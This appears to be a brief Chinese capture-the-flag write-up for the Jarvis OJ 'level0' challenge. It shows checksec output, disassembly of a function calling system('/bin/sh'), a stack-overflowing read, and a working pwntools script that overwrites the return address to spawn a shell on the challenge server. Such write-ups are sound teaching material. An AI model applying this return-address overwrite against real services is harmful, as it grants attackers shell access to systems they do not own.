查保护和运行操作系统
liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)开启了NX保护,64位系统
text:0000000000400596 ; __unwind { .text:0000000000400596 push rbp .text:0000000000400597 mov rbp, rsp .text:000000000040059A mov edi, offset command ; "/bin/sh" .text:000000000040059F call _system .text:00000000004005A4 pop rbp .text:00000000004005A5 retn .text:00000000004005A5 ; } // starts at 400596 .text:00000000004005A5 callsystem endp .text:00000000004005A5有system(“/bin/sh”)函数
ssize_t vulnerable_function() { char buf; // [rsp+0h] [rbp-80h] return read(0, &buf, 0x200uLL); }栈溢出
from pwn import * s_addr=0x0000000000400596 p=remote("pwn2.jarvisoj.com",9881) p.recvline() p.sendline("A"*0x80+'A'*8+p64(s_addr)) p.interactive()与32位不同之处:rbp是8个字节。打包用的函数是p64()
